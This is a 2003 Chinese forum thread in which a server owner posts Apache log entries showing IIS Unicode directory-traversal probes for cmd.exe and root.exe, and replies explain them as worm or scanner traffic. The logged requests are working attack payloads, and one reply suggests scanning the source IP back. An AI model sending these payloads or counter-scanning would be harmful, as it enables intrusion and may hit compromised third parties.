QQ登录

只需一步,快速开始

 找回密码
 注册

QQ登录

只需一步,快速开始

查看: 715|回复: 3

这个是什么意思???是有谁在攻击我吗???

[复制链接]
发表于 2003-2-2 10:31:14 | 显示全部楼层 |阅读模式
[code:1]218.26.187.229 - - [02/Feb/2003:07:26:55 +0900] "GET /msadc/..%255c../..%255c../
..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
404 368
218.26.187.229 - - [02/Feb/2003:07:26:56 +0900] "GET /scripts/..%c1%1c../winnt/s
ystem32/cmd.exe?/c+dir HTTP/1.0" 404 334
218.26.187.229 - - [02/Feb/2003:07:26:56 +0900] "GET /scripts/..%c0%2f../winnt/s
ystem32/cmd.exe?/c+dir HTTP/1.0" 404 334
218.26.187.229 - - [02/Feb/2003:07:26:57 +0900] "GET /scripts/..%c0%af../winnt/s
ystem32/cmd.exe?/c+dir HTTP/1.0" 404 334
218.26.187.229 - - [02/Feb/2003:07:26:58 +0900] "GET /scripts/..%c1%9c../winnt/s
ystem32/cmd.exe?/c+dir HTTP/1.0" 404 334
218.26.187.229 - - [02/Feb/2003:07:26:58 +0900] "GET /scripts/..%%35%63../winnt/
system32/cmd.exe?/c+dir HTTP/1.0" 400 318
218.26.187.229 - - [02/Feb/2003:07:26:59 +0900] "GET /scripts/..%%35c../winnt/sy
stem32/cmd.exe?/c+dir HTTP/1.0" 400 318
218.26.187.229 - - [02/Feb/2003:07:27:00 +0900] "GET /scripts/..%25%35%63../winn
t/system32/cmd.exe?/c+dir HTTP/1.0" 404 335
218.26.187.229 - - [02/Feb/2003:07:27:00 +0900] "GET /scripts/..%252f../winnt/sy
stem32/cmd.exe?/c+dir HTTP/1.0" 404 335
218.26.217.76 - - [02/Feb/2003:10:00:29 +0900] "GET /scripts/root.exe?/c+dir HTT
P/1.0" 404 313
218.26.217.76 - - [02/Feb/2003:10:00:30 +0900] "GET /MSADC/root.exe?/c+dir HTTP/
1.0" 404 311
@[/code:1]


上面是我的apache的access log...[/code]
 楼主| 发表于 2003-2-2 10:36:01 | 显示全部楼层
还有...

[code:1]
200.206.62.115 - - [02/Feb/2003:04:31:25 +0900] "GET /scripts/root.exe?/c+dir HT
TP/1.0" 404 313
200.206.62.115 - - [02/Feb/2003:04:31:29 +0900] "GET /MSADC/root.exe?/c+dir HTTP
/1.0" 404 311
200.206.62.115 - - [02/Feb/2003:04:31:35 +0900] "GET /c/winnt/system32/cmd.exe?/
c+dir HTTP/1.0" 404 321
200.206.62.115 - - [02/Feb/2003:04:31:38 +0900] "GET /d/winnt/system32/cmd.exe?/
c+dir HTTP/1.0" 404 321
200.206.62.115 - - [02/Feb/2003:04:31:41 +0900] "GET /scripts/..%255c../winnt/sy
stem32/cmd.exe?/c+dir HTTP/1.0" 404 335
200.206.62.115 - - [02/Feb/2003:04:31:44 +0900] "GET /_vti_bin/..%255c../..%255c
../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 352
200.206.62.115 - - [02/Feb/2003:04:31:47 +0900] "GET /_mem_bin/..%255c../..%255c
../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 352
200.206.62.115 - - [02/Feb/2003:04:31:51 +0900] "GET /msadc/..%255c../..%255c../
..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
404 368
200.206.62.115 - - [02/Feb/2003:04:31:55 +0900] "GET /scripts/..%c1%1c../winnt/s
ystem32/cmd.exe?/c+dir HTTP/1.0" 404 334
200.206.62.115 - - [02/Feb/2003:04:31:59 +0900] "GET /scripts/..%c0%2f../winnt/s
ystem32/cmd.exe?/c+dir HTTP/1.0" 404 334[/code:1]

请问我有什么办法可以通过IP查他,攻击他???怎么预防???

我的服务器是rh7.1,客户机是XP...
回复

使用道具 举报

发表于 2003-2-2 11:16:15 | 显示全部楼层
哈哈,没事的。那是人家用扫描程序扫描你的机器。
从log可以看出它是扫描你的机器有没有IIS的Unicode(?)漏洞
你又不用Win2000的IIS,所以对你来说这些对你的服务器安全是没什么影响的
(当然也不能不注意安全,如果Apache发现有什么新漏洞,别忘了打补丁)

你知道他的IP,也可以扫描他啊。看看他的机器有什么漏洞。。。。。其他的就不说了
那IP也有可能是被黑了,其他人通过他扫描。:)
回复

使用道具 举报

发表于 2003-2-8 14:12:59 | 显示全部楼层
中了尼姆达类的病毒的机器会主动去扫描其他机器,以达到感染和传播病毒的目的。

并不见得是一个人没事做,在扫啊扫,想攻击你。
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

GMT+8, 2024-11-17 12:56 , Processed in 0.034855 second(s), 16 queries .

© 2021 Powered by Discuz! X3.5.

快速回复 返回顶部 返回列表